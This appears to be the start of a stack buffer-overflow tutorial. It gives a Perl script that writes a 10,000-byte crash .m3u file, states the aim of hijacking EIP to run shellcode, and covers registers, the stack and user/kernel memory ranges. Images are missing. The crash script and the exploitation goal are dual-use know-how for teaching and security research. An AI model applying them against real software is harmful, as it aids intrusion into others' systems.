Verify the bug

my $file= "crash.m3u";
my $junk= "\\x41" x 10000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\\n";

image.png

Main Goal

Controller the application flow to execute unintended instructions which is our “shellcode”

image.png

Before we proceed – some theory

  1. The EIP control the next instruction to be executed
  2. The program variables in the data segment
  3. stack we will PUSH and POP data from it

image.png

  1. ESP points to the top of the stack which is the lowest point as the stack grow downward
  2. when we POP something from the stack we increment it’s value by 4 bytes

image.png

CPU Registers

image.png

Process Memory

  1. User-land: when process is create it reserve the memory address for the user-mode from 0x00000000 To 0x7FFFFFFF
  2. Kernel-land: when the process is created it reserve the memory address for the kernel-mode from 0x80000000 to 0xFFFFFFFF